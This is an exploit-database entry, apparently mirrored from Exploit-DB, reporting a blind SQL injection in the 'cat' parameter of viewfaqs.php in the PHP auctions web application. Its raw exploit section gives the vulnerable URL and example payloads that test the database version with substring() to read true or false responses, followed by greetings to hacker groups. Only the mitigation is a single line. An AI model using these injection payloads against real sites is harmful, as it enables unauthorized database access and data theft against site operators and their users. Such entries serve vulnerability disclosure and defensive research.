header-logo
Suggest Exploit
vendor:
N/A
by:
BorN To K!LL - h4ck3r
8.8
CVSS
HIGH
Blind-Injection
89
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
n/a

PHP auctions

The vulnerability exists in the viewfaqs.php script, which allows an attacker to inject malicious SQL queries into the application. The attacker can use the substring() function to check the version of the database and determine if the query is true or false.

Mitigation:

Input validation should be used to prevent malicious SQL injection attacks.
Source

Exploit-DB raw data:

==
[#]Script: PHP auctions
[#]Version: n/a
[#]Link: http://phpauctions.info
==
[#]Author: BorN To K!LL - h4ck3r
[#]Contact: SQL@hotmail.co.uk
==
[#]3xploit:
/viewfaqs.php?cat=[Blind-Injection]

[#]3xample:
/viewfaqs.php?cat=2 and substring(version(),1,1)=4             // false ,,
/viewfaqs.php?cat=2 and substring(version(),1,1)=5            // true ,,

==
[#]Greetings:
darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"
==